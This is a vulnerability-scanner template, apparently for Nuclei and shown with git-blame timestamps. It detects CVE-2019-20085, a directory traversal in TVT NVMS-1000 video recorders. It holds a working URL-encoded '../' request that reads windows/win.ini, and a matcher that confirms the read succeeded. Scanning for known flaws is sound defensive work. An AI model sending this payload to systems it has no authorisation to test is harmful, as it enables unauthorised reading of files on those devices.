2021-07-16 12:17:49 +00:00
|
|
|
id: CVE-2019-20085
|
|
|
|
|
|
|
|
info:
|
2022-06-10 15:53:16 +00:00
|
|
|
name: TVT NVMS 1000 - Local File Inclusion
|
2021-07-16 12:17:49 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: high
|
2022-06-20 17:22:01 +00:00
|
|
|
description: |
|
|
|
|
TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-07-16 12:17:49 +00:00
|
|
|
- https://www.exploit-db.com/exploits/48311
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.exploit-db.com/exploits/47774
|
|
|
|
- http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html
|
2022-06-10 15:53:16 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-20085
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2019,iot,lfi,kev,edb,packetstorm
|
2021-07-16 12:17:49 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-08-14 11:22:17 +00:00
|
|
|
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
|
2021-07-16 12:17:49 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
2022-06-20 17:22:01 +00:00
|
|
|
part: body
|
2021-07-16 12:17:49 +00:00
|
|
|
regex:
|
|
|
|
- "\\[(font|extension|file)s\\]"
|
2022-06-20 17:22:01 +00:00
|
|
|
|
2021-07-16 12:17:49 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-10 15:53:16 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/06/10
|